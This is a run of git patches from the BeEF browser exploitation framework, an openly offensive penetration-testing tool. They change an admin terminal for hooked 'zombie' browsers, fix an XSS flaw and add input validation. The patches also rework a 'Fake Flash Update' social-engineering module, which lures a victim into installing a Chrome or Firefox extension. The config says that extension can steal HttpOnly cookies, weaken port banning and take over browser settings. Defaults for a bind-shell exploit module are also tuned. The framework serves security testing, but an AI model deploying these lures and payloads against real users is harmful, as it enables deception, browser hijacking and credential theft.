+        store: ipec_logs_store,
+        bbar: ipec_logs_bbar,
+        border: false,
+        loadMask: {msg:'Loading History...'},
+
+        viewConfig: {
+            forceFit:true
+        },
+
+        view: new Ext.grid.GridView({
+            forceFit: true,
+            emptyText: "No History",
+            enableRowBody:true
+        }),
+
+        columns: [
+            {header: 'Id', width: 10, sortable: true, dataIndex: 'id', hidden:true},
+            {header: 'Vector Method', width: 30, sortable: true, dataIndex: 'vector_method', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+            {header: 'Vector Name', width: 40, sortable: true, dataIndex: 'vector_name', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+            {header: 'Vector PoC', sortable: true, dataIndex: 'vector_poc', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}
+        ],
+
+        listeners: {
+            afterrender: function(datagrid) {
+                datagrid.store.reload({params:{start:0,limit:req_pagesize, sort: "date", dir:"DESC"}});
+            }
+        }
+    });
+
+    var ipec_logs_panel = new Ext.Panel({
+		id: 'ipec-logs-panel-zombie-'+zombie.session,
+		title: 'Logs',
+		items:[ipec_logs_grid],
+		layout: 'fit',
+
+		listeners: {
+			activate: function(ipec_logs_panel) {
+				ipec_logs_panel.items.items[0].store.reload();
+			}
+		}
+	});
+
+    function genScanSettingsPanel(zombie, bar, value) {
+
+		panel = Ext.getCmp('ipec-config-zombie-'+zombie.session);
+		panel.setTitle('Prompt');
+        panel.add(ipec_terminal_panel);
+//		panel.add(form);
+	}
+
+	ZombieTab_IpecTab.superclass.constructor.call(this, {
+        id: 'ipec-log-tab-'+zombie.session,
+		title: 'Ipec',
+		activeTab: 0,
+		viewConfig: {
+			forceFit: true,
+			type: 'fit',
+            autoScroll:true
+        },
+        items: [ipec_config_panel],
+        bbar: commands_statusbar,
+        listeners: {
+			afterrender : function(){
+				genScanSettingsPanel(zombie, commands_statusbar);
+			},
+        autoScroll:true
+
+        }
+	});
+};
+
+Ext.extend(ZombieTab_IpecTab, Ext.TabPanel, {} );
\ No newline at end of file
diff --git a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
new file mode 100644
index 000000000..11262b0d1
--- /dev/null
+++ b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
@@ -0,0 +1,415 @@
+/**
+ * @Author :        venkatakrishnan ganesh
+ * @file   :        wterm.jquery.js
+ * @url    :        http://wterminal.appspot.com
+ * @desc   :
+ *
+ * Allows Emulation of Terminal on the browser.
+ * Completely Extendible. 
+ * Command History.
+ * Commandline Editing. 
+ *
+ * Modified by antisnatchor
+ * */
+
+( function( $ ) {
+
+   
+  var VERSION = '0.0.4';
+
+  /**
+  *
+  * @function : get_defaults
+  * @returns  : Object
+  * @desc     : Returns Global Defaults
+  *
+  * */
+  var get_defaults = function() {
+
+    return {
+
+      // PS1 : The Primary Prompt
+      PS1                : 'BeEF-bind-$',
+
+      // TERMINAL_CLASS  
+      // Will be applied to the primary terminal container
+      TERMINAL_CLASS     : 'wterm_terminal',
+
+      // PROMPT_CLASS 
+      // Will Applied to prompt container
+      PROMPT_CLASS       : 'wterm_prompt',
+
+      // THEME_CLASS_PREFIX
+      // All Theme Classes will be prefixed by this string
+      THEME_CLASS_PREFIX : 'wterm_theme',
+
+      // DEFAULT_THEME
+      // The theme that is applied by default
+      DEFAULT_THEME      : '_green_on_black',
+
+      // HIGHLIGHT_CLASS
+      // The Class that is applied to highlighted text
+      HIGHLIGHT_CLASS    : 'wterm_highlight',
+
+      // KEYWORD_CLASS
+      // The Class that is applied to keywords
+      KEYWORD_CLASS      : 'wterm_keyword',
+
+      // CONTENT_CLASS 
+      // The Class that is applied to content section 
+      KEYWORD_CLASS      : 'wterm_content',
+
+      // WIDTH | HIGHT
+      // Explicitly set width and height of the terminal
+      // container. This may also be done in TERMINAL_CLASS
+      WIDTH              : '90%',
+      HEIGHT             : '90%', 
+
+      // WELCOME_MESSAGE
+      // Message to be shown when the terminal is first 
+      // published
+      WELCOME_MESSAGE    : 'Welcome to Wterm version-' + VERSION ,
+
+      // NOT_FOUND
+      // Message to be published if the command is not found
+      // Note: "CMD" will be replaced with the actual command
+      NOT_FOUND          : '<div> CMD: Command Not Found </div>',
+
+      // AUTOCOMPLETE
+      // Is Autocomplete feature Enabled
+      // Please see the manual on how AUTOCOMPLETE is implemented
+      AUTOCOMPLETE      : true,
+
+      // HISTORY
+      // Is Command History Enabled
+      HISTORY           : true,
+
+      // HISTORY
+      // No of entries to be stored in HISTORY
+      HISTORY_ENTRIES  : 100,
+
+
+      // AJAX_METHOD
+      // The HTTP Method that must be used for Ajax Requests
+      AJAX_METHOD      : 'GET',
+
+
+      // AJAX_PARAMETER
+      // The GET/POST parameter that should be used to make requests
+      AJAX_PARAM      : 'tokens',
+
+      // ERROR_PREFIX
+      // Prefix For Error Messages
+      ERROR_PREFIX    : 'An Error Occured: '
+
+    };
+  };
+
+ 
+  /**
+  * @property : dispatch
+  * @accessor : $.register_command ( See Below )
+  * @private
+  * @desc     : 
+  *
+  * dispatch table stores command name and action
+  * to be taken when user enters a command. See
+  * Manual for more details on how to implement 
+  * your own commands
+  *
+  **/
+  var dispatch = { 
+  };
+
+
+  /**
+  *
+  * @method : wterm
+  * @public
+  * @desc   : Sets up the terminal on the JQ object that 
+  * represents a ( or a group ) of HTML NODE (s)
+  *
+  **/
+  $.fn.wterm = function( options ) {
+
+
+    // Merge defaults with options
+    var settings = get_defaults();
+    $.extend( true, settings, options );
+
+    // JQ Plugin surprised??
+    return this.each( function() {
+
+      
+      var element  = $( this );
+      var history  = [ ];
+      var hcurrent = null;
+      
+      // Set up some markup in the element
+      // required for terminal emulation
+      element.addClass( settings.TERMINAL_CLASS ).addClass( settings.THEME_CLASS_PREFIX + settings.DEFAULT_THEME );
+      if( settings.WIDTH && settings.HEIGHT ) element.css( { width: settings.WIDTH, height: settings.HEIGHT } )
+      element.html( '' ).append( '<div>' + settings.WELCOME_MESSAGE + '</div>' );
+
+      element.append( '<div class="' + settings.CONTENT_CLASS + '"></div>' );
+      element.append( '<div><span class="' + settings.PROMPT_CLASS + '">' + settings.PS1 + '&nbsp;</span>' +
+                      '<form> <input type="text" ></form></div>' ); 
+
+
+      // Representing prompt, form, input and content section 
+      // in the terminal
+      var _prompt    = element.find( 'div:last span:last' );
+      var input_form = element.find( 'div:last form' );
+      var input      = element.find( 'div:last form input' );
+      var content    = element.find( '.' + settings.CONTENT_CLASS );
+
+      // Custom Dispatcher
+      var cdispatch  = null;
+
+      // Temprary storage for autocomplete configuration
+      var ac_save    = null;
+
+      // Temporary store for current prompt
+      var cprompt    = null;
+      
+      // Curson always needs to be on the prompt
+      input.focus();
+      element.click( function() { input.focus(); } );
+
+
+      /**
+      * @method   : hide
+      * @private  :
+      * @desc     : Hides the prompt
+      **/
+      var hide = function() {
+        _prompt.hide();
+      };
+
+      /**
+      * @method   : show 
+      * @private  :
+      * @desc     : Shows the prompt
+      **/
+      var show = function() {
+        _prompt.show();
+        input.focus();
+      };
+   
+      /**
+      * @method   : update_content
+      * @private  :
+      * @desc     : Updates the content section
+      * @args     : current_prompt, command, data
+      **/
+      var update_content = function( p, cmd, data ) {
+        content.append( '<div><span>' + p + ' ' + cmd + '</span><div>' + ( ( data ) ? data : '' ) + '</div></div>' );
+      }; 
+
+      /**
+      * @method   : clear_content
+      * @private  :
+      * @desc     : Updates the content section
+      * @args     : current_prompt, command, data
+      **/
+      var clear_content = function() {
+        content.html( '' );
+      };
+
+      // Add the command to the dispatch
+      dispatch.clear = clear_content;
+
+
+
+      /**
+      * @method   : set_prompt 
+      * @private  :
+      * @desc     : Set the current prompt
+      * @args     : string 
+      **/
+      set_prompt = function( p ) {
+        if( p && p.length ) element.find( '.' + settings.PROMPT_CLASS).html( p + '&nbsp;' );
+      };
+
+ 
+
+      /**
+      *
+      * @method   : Anonymous
+      * @private  :
+      * @event_handler
+      *
+      **/
+      input_form.submit( function( e ) {
+        e.preventDefault();
+        e.stopPropagation();
+
+        var value = input.attr( 'value' );
+
+        if( settings.HISTORY ) {
+          if( history.length > settings.HISTORY_ENTRIES ) history.shift();
+          history.push( value );
+        }
+        
+        // Reset The Input
+        input.attr( 'value', '' );
+        var tokens = value.split( /\s+/ );
+        var key    = tokens[0];
+        
+        hide(); 
+
+        var get_current_prompt = function() {
+          return ( cprompt ) ? cprompt : settings.PS1;
+        }
+
+        var _dispatch = function( key, tokens ) {
+
+          if( typeof key === 'function' ) {
+              data = key( tokens );
+              if( data ) { update_content( get_current_prompt(), value, data ) }
+          } else if( typeof key === 'string' ) {
+            var to_send = { };
+            to_send[ settings.AJAX_PARAM ] = tokens.join( ' ' );
+
+            var on_complete = function( data, text_status ) {
+              update_content( get_current_prompt(), value, data )
+            };
+           
+            $[ settings.AJAX_METHOD.toLowerCase() ](  key, to_send, on_complete );
+          }
+        };
+
+        if( key == '' ) {
+          update_content( get_current_prompt() , '' )
+        } else if( cdispatch && key == 'exit' ) {
+           
+           // Recover old configuration and Dispatch exit hook
+           settings.AUTOCOMPLETE = ( ac_save ) ? ac_save : false ;
+
+           // Todo: test what happens when exit hook is not defined
+           if( cdispatch.EXIT_HOOK ) {
+             _dispatch( cdispatch.EXIT_HOOK, tokens );
+           } else {
+             _dispatch( function() { return '<b></b>' }, tokens );
+           }
+       
+          // Clear temporary values
+          cdispatch = null;  
+          cprompt   = null;
+
+          // Reset the prompt
+          set_prompt( settings.PS1 );
+
+        } else if( cdispatch ) {
+
+          // Dispatch to the custom dispatcher
+          _dispatch( cdispatch.DISPATCH, tokens ); 
+
+        } else if( dispatch[ key ] ) {
+          if( typeof dispatch[ key ] === 'object' ) {
+            cdispatch = dispatch[ key ];
+            cprompt   = cdispatch.PS1 || key;
+            set_prompt( cprompt );
+
+            ac_save = settings.AUTOCOMPLETE;
+            settings.AUTOCOMPLETE = false;
+
+            // Todo:See what happens if start hook is not defined
+            if( cdispatch.START_HOOK ) {
+              _dispatch( cdispatch.START_HOOK, tokens );
+            } else {
+              // A stupid Hack
+              _dispatch( function() { return '<b></b>' }, tokens );
+            }
+          } else {
+            _dispatch( dispatch[ key ], tokens );
+          } 
+        } else {
+          update_content( settings.PS1, value, settings.NOT_FOUND.replace( 'CMD', tokens[0] ));
+        }
+
+        show();
+
+
+      } );
+
+
+      /**
+      *
+      * @method   : Anonymous
+      * @private  :
+      * @event_handler
+      *
+      **/
+      input.keydown( function( e ) {
+        var keycode = e.keyCode;
+        switch( keycode ) {
+
+          case 9:
+
+            e.preventDefault();
+
+            if( settings.AUTOCOMPLETE ) {
+              var commands      = [ ];   
+              var current_value = input.attr( 'value' );
+              // Command Completion
+              if( current_value.match( /^[^\s]{0,}$/ ) ) {
+                for( i in dispatch ) {
+                  if( current_value == '' ) {
+                    commands.push( i );
+                  } else if( i.indexOf( current_value ) == 0 ) {
+                    commands.push( i );
+                  }
+                }
+               
+                if( commands.length > 1 ) { 
+                  update_content( settings.PS1, current_value, commands.join( '<br>' ) );
+                } else if( commands.length == 1 ) {
+                  input.attr( 'value', commands.pop() + ' ' );  
+                }
+              }
+            }
+
+          break;
+
+          // History Up
+          case 38:
+            e.preventDefault();
+            if( settings.HISTORY ) {
+              hcurrent  = ( hcurrent === null )? history.length - 1 : ( hcurrent == 0 ) ? history.length - 1 : hcurrent - 1;
+              input.attr( 'value', history[ hcurrent ] );
+            }
+          break;
+
+          // History Down
+          case 40:
+            e.preventDefault();
+            if( settings.HISTORY ) {
+              if( hcurrent === null || hcurrent == (history.length - 1 ) ) break;
+              hcurrent++;
+              input.attr( 'value', history[ hcurrent ] );
+            }
+          break;
+
+          default:
+          break;
+        }
+      });
+    });
+
+  };
+
+
+  $.register_command = function( command, dispatch_method ) {
+    try {
+      if( typeof dispatch_method === 'function' || typeof dispatch_method === 'string' || typeof dispatch_method === 'object' ) {
+        dispatch[ command ] = dispatch_method;
+      } else {
+        throw 'Dispatch needs to be a method';
+      }
+    } catch ( e ) {
+      // Error Handling here
+    }
+  };
+
+})( jQuery );

From aae9f5b66cae69198cb4c7a61a4309ff8e38abe3 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 16:12:43 +1100
Subject: [PATCH 074/397] Removed dead code from the IPEC admin_ui tab panel.

---
 .../javascript/ui/panel/tabs/ZombieTabIpec.js | 76 +------------------
 1 file changed, 2 insertions(+), 74 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
index ca4dbb325..5015d9ad4 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
@@ -21,8 +21,6 @@ ZombieTab_IpecTab = function(zombie) {
 
 	var commands_statusbar = new Beef_StatusBar('ipec-bbar-zombie-'+zombie.session);
 
-     var req_pagesize = 30;
-
     var ipec_config_panel = new Ext.Panel({
 		id: 'ipec-config-zombie-'+zombie.session,
 		title: 'Scan Config',
@@ -256,81 +254,11 @@ ZombieTab_IpecTab = function(zombie) {
 
     });
 
-     var ipec_logs_store = new Ext.ux.data.PagingJsonStore({
-        storeId: 'ipec-logs-store-zombie-' + zombie.session,
-        url: '/ui/ipec/zombie.json',
-        remoteSort: false,
-        autoDestroy: true,
-        autoLoad: false,
-        root: 'logs',
-
-        fields: ['id', 'vector_method', 'vector_name', 'vector_poc'],
-        sortInfo: {field: 'id', direction: 'DESC'},
-
-        baseParams: {
-            nonce: Ext.get("nonce").dom.value,
-            zombie_session: zombie.session
-        }
-    });
-
-    var ipec_logs_bbar = new Ext.PagingToolbar({
-        pageSize: req_pagesize,
-        store: ipec_logs_store,
-        displayInfo: true,
-        displayMsg: 'Displaying history {0} - {1} of {2}',
-        emptyMsg: 'No history to display'
-    });
-
-    var ipec_logs_grid = new Ext.grid.GridPanel({
-        id: 'ipec-logs-grid-zombie-' + zombie.session,
-        store: ipec_logs_store,
-        bbar: ipec_logs_bbar,
-        border: false,
-        loadMask: {msg:'Loading History...'},
-
-        viewConfig: {
-            forceFit:true
-        },
-
-        view: new Ext.grid.GridView({
-            forceFit: true,
-            emptyText: "No History",
-            enableRowBody:true
-        }),
-
-        columns: [
-            {header: 'Id', width: 10, sortable: true, dataIndex: 'id', hidden:true},
-            {header: 'Vector Method', width: 30, sortable: true, dataIndex: 'vector_method', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
-            {header: 'Vector Name', width: 40, sortable: true, dataIndex: 'vector_name', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
-            {header: 'Vector PoC', sortable: true, dataIndex: 'vector_poc', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}
-        ],
-
-        listeners: {
-            afterrender: function(datagrid) {
-                datagrid.store.reload({params:{start:0,limit:req_pagesize, sort: "date", dir:"DESC"}});
-            }
-        }
-    });
-
-    var ipec_logs_panel = new Ext.Panel({
-		id: 'ipec-logs-panel-zombie-'+zombie.session,
-		title: 'Logs',
-		items:[ipec_logs_grid],
-		layout: 'fit',
-
-		listeners: {
-			activate: function(ipec_logs_panel) {
-				ipec_logs_panel.items.items[0].store.reload();
-			}
-		}
-	});
-
-    function genScanSettingsPanel(zombie, bar, value) {
+    function createIpecTerminalPanel(zombie, bar, value) {
 
 		panel = Ext.getCmp('ipec-config-zombie-'+zombie.session);
 		panel.setTitle('Prompt');
         panel.add(ipec_terminal_panel);
-//		panel.add(form);
 	}
 
 	ZombieTab_IpecTab.superclass.constructor.call(this, {
@@ -346,7 +274,7 @@ ZombieTab_IpecTab = function(zombie) {
         bbar: commands_statusbar,
         listeners: {
 			afterrender : function(){
-				genScanSettingsPanel(zombie, commands_statusbar);
+				createIpecTerminalPanel(zombie, commands_statusbar);
 			},
         autoScroll:true
 

From 9aab6f1cf48f2d4a3aec7ceacc0febdb91b6a1c9 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 17:19:46 +1100
Subject: [PATCH 075/397] Patched jquery-encoder to prevent exception on
 encoderForJavascript. Patched wterm.jquery.js to prevent XSS. Added IP/port
 validation to IPEC shell.

---
 .../javascript/esapi/jquery-encoder-0.1.0.js  |  2 +-
 .../javascript/ui/panel/tabs/ZombieTabIpec.js | 43 ++++++-------------
 .../media/javascript/wterm/wterm.jquery.js    |  7 ++-
 3 files changed, 18 insertions(+), 34 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js b/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js
index d120d8c74..d05281662 100644
--- a/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js
+++ b/extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js
@@ -21,7 +21,7 @@ encoded+=': ';}
 for(var i=0;i<input.length;i++){var ch=input.charAt(i),cc=input.charCodeAt(i);if(!ch.match(/[a-zA-Z0-9]/)&&$.inArray(ch,immune)<0){var hex=cc.toString(16);var pad='000000'.substr((hex.length));encoded+='\\'+pad+hex;}else{encoded+=ch;}}
 return encoded;},encodeForURL:function(input,attr){hasBeenInitialized=true;var encoded='';if(attr){if(attr.match(/^[A-Za-z\-0-9]{1,}$/)){encoded+=$.encoder.canonicalize(attr).toLowerCase();}else{throw"Illegal Attribute Name Specified";}
 encoded+='="';}
-encoded+=encodeURIComponent(input);encoded+=attr?'"':'';return encoded;},encodeForJavascript:function(input){hasBeenInitialized=true;if(!immune)immune=default_immune['js'];var encoded='';for(var i=0;i<input.length;i++){var ch=input.charAt(i),cc=input.charCodeAt(i);if($.inArray(ch,immune)>=0||hex[cc]==null){encoded+=ch;continue;}
+encoded+=encodeURIComponent(input);encoded+=attr?'"':'';return encoded;},encodeForJavascript:function(input){hasBeenInitialized=true;immune=default_immune['js'];var encoded='';for(var i=0;i<input.length;i++){var ch=input.charAt(i),cc=input.charCodeAt(i);if($.inArray(ch,immune)>=0||hex[cc]==null){encoded+=ch;continue;}
 var temp=cc.toString(16),pad;if(cc<256){pad='00'.substr(temp.length);encoded+='\\x'+pad+temp.toUpperCase();}else{pad='0000'.substr(temp.length);encoded+='\\u'+pad+temp.toUpperCase();}}
 return encoded;},canonicalize:function(input,strict){hasBeenInitialized=true;if(input===null)return null;var out=input,cycle_out=input;var decodeCount=0,cycles=0;var codecs=[new HTMLEntityCodec(),new PercentCodec(),new CSSCodec()];while(true){cycle_out=out;for(var i=0;i<codecs.length;i++){var new_out=codecs[i].decode(out);if(new_out!=out){decodeCount++;out=new_out;}}
 if(cycle_out==out){break;}
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
index 5015d9ad4..509956179 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
@@ -85,6 +85,11 @@ ZombieTab_IpecTab = function(zombie) {
         return str;
     }
 
+    function validateNumber(input, min, max) {
+        var value = parseInt(input);
+        return (!isNaN(value) && value >= min && value <= max);
+    }
+
 
     function initTerminal(zombie){
         String.prototype.reverse = function() {
@@ -99,42 +104,18 @@ ZombieTab_IpecTab = function(zombie) {
         var target_port = "";
 
         var command_directory = {
-            'eval': function( tokens ) {
-                tokens.shift();
-                var expression = tokens.join( ' ' );
-                var result = '';
-                try {
-                    result = eval( expression );
-                } catch( e ) {
-                    result = 'Error: ' + e.message;
-                }
-                return result;
-            },
-
-            'date': function( tokens ) {
-                var now = new Date();
-                return now.getDate() + '-' +
-                    now.getMonth() + '-' +
-                    ( 1900 + now.getYear() )
-            },
-
-            'cap': function( tokens ) {
-                tokens.shift();
-                return tokens.join( ' ' ).toUpperCase();
-            },
-
-            'go': function( tokens ) {
-                var url = tokens[1];
-                document.location.href = url;
-            },
 
             'target': function(tokens){
+                var ip_regex = new RegExp('^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$');
                 target_ip = tokens[1];
-                target_port = tokens[2];
-                return "Target is now " + tokens[1] + ":" + tokens[2];
+                target_port =  tokens[2];
+                if(ip_regex.test(target_ip) && validateNumber(target_port, 1, 65535)){
+                    return "Target is now " + tokens[1] + ":" + tokens[2];
+                }else{
+                    return "Target error: invalid IP or port.";
+                }
             },
 
-
             'exec': function(tokens){
                 if(target_ip.length == 0 || target_port.length == 0)
                    return "Error: target ip or port not set."
diff --git a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
index 11262b0d1..cce76761f 100644
--- a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
+++ b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
@@ -9,7 +9,7 @@
  * Command History.
  * Commandline Editing. 
  *
- * Modified by antisnatchor
+ * Modified by antisnatchor (also to prevent XSS, see line 270)
  * */
 
 ( function( $ ) {
@@ -266,7 +266,10 @@
 
           if( typeof key === 'function' ) {
               data = key( tokens );
-              if( data ) { update_content( get_current_prompt(), value, data ) }
+              /*
+               * antisnatchor: preventing XSS
+               */
+              if( data ) { update_content( get_current_prompt(), $jEncoder.encoder.encodeForJavascript(value), data)}
           } else if( typeof key === 'string' ) {
             var to_send = { };
             to_send[ settings.AJAX_PARAM ] = tokens.join( ' ' );

From 636fee96074a7109bef4aff219876df8787393a8 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 17:25:16 +1100
Subject: [PATCH 076/397] Modified Fake_flash_update module (with drop-down
 menu) to support Firefox Extension delivery.

---
 .../fake_flash_update/command.js              | 24 +++++++++++++++----
 .../fake_flash_update/config.yaml             |  4 ++--
 .../fake_flash_update/module.rb               | 10 +++++---
 3 files changed, 29 insertions(+), 9 deletions(-)

diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js
index c86e73fce..92b0529d7 100644
--- a/modules/social_engineering/fake_flash_update/command.js
+++ b/modules/social_engineering/fake_flash_update/command.js
@@ -16,11 +16,27 @@
 beef.execute(function() {
   
   	// Grab image and payload from config
-  	image = "<%== @image %>";
-  	payload = "<%== @payload %>";
+  	var image = "<%== @image %>";
+    var payload_type = "<%== @payload %>";
+    var payload_root =  "<%== @payload_root %>";
+
+    var chrome_extension = "/demos/adobe_flash_update.crx";
+    var firefox_extension = "/api/ipec/ff_extension";
+    var payload = "";
+    switch (payload_type) {
+        case "Chrome_Extension":
+            payload = payload_root + chrome_extension;
+            break;
+        case "Firefox_Extension":
+            payload = payload_root + firefox_extension;
+            break;
+        default:
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=Error. No Payload selected.');
+            break;
+    }
 
   	// Add div to page
-	div = document.createElement('div');
+    var div = document.createElement('div');
 	div.setAttribute('id', 'splash');
 	div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
 	div.setAttribute('align', 'center');
@@ -28,6 +44,6 @@ beef.execute(function() {
 	div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\'  /></a>';
     $j("#splash").click(function () {
       $j(this).hide();
-      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
     });
 });
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
index ad567c783..084807c2a 100644
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Social Engineering"
             name: "Fake Flash Update"
-            description: "Prompts the user to install an update to Adobe Flash Player.<br />The default install file is a Chrome extension. <br /><br /> A chrome extenstion has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded."
-            authors: ["mh"]
+            description: "Prompts the user to install an update to Adobe Flash Player.<br />The file to be delivered could be a Chrome or Firefox extension. <br /><br /> A Chrome extension has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.<br /><br />The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.<br />See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
+            authors: ["mh", "antisnatchor"]
             target:
                 user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb
index 58e05d06d..59b4cbd0f 100644
--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -17,12 +17,16 @@ class Fake_flash_update < BeEF::Core::Command
   
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    payload = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.crx"
+    payload_root = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}"
     image = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
 
     return [
-        {'name' =>'payload', 'description' =>'Location of the chrome extension that user is promted to install', 'ui_label'=>'Chrome extension', 'value' => payload},
-        {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image}
+        {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image},
+        {'name' =>'payload_root', 'description' =>'BeEF (Payload) root path', 'ui_label'=>'BeEF (Payload) root path', 'value' => payload_root},
+        { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
+          'store_fields' => ['payload'], 'store_data' => [['Chrome_Extension'],['Firefox_Extension']],
+          'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
+        }
 
     ]
   end

From ce4018d46491773b9f2dae13faffc0cdce83d4cb Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 17:26:59 +1100
Subject: [PATCH 077/397] Enabled IPEC extension in main config.yaml

---
 config.yaml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/config.yaml b/config.yaml
index a0d9db706..b021a3a3b 100644
--- a/config.yaml
+++ b/config.yaml
@@ -99,3 +99,5 @@ beef:
         console:
              shell:
                 enable: false
+        ipec:
+            enable: true

From 7c7fc5ae6eac9cebfa6668e34dfe551775fff414 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 22 Oct 2012 23:26:33 +1030
Subject: [PATCH 078/397] Small modifications to a few modules

Updated a few default IP addresses to 127.0.0.1

Updated a few module names

Fixed config.yaml whitespace bug
---
 modules/exploits/beefbind/beef_bind_shell/config.yaml       | 2 +-
 modules/exploits/beefbind/beef_bind_shell/module.rb         | 2 +-
 modules/exploits/beefbind/beef_bind_staged_deploy/module.rb | 2 +-
 modules/exploits/zenoss_add_user_csrf/config.yaml           | 4 ++--
 modules/exploits/zenoss_daemon_csrf/config.yaml             | 4 ++--
 5 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/beefbind/beef_bind_shell/config.yaml b/modules/exploits/beefbind/beef_bind_shell/config.yaml
index 9ce2708a9..89bb770f0 100755
--- a/modules/exploits/beefbind/beef_bind_shell/config.yaml
+++ b/modules/exploits/beefbind/beef_bind_shell/config.yaml
@@ -22,4 +22,4 @@ beef:
             description: "Send commands to be executed on the already deployed BeEF_bind shellcode, and get results back."
             authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller
             target:
-                working: ["FF","C","S"]
+                working: ["FF", "C", "S"]
diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb
index 30e7d174a..86a7c0b96 100755
--- a/modules/exploits/beefbind/beef_bind_shell/module.rb
+++ b/modules/exploits/beefbind/beef_bind_shell/module.rb
@@ -17,7 +17,7 @@ class Beef_bind_shell < BeEF::Core::Command
 
 	def self.options
 		return [
-      { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '172.16.67.135'},
+      { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
       { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
       { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
       { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
index 9ca8c3bde..69dd2d9b9 100755
--- a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
@@ -21,7 +21,7 @@ class Beef_bind_staged_deploy < BeEF::Core::Command
     beef_port = "#{configuration.get("beef.http.port")}"
 
 		return [
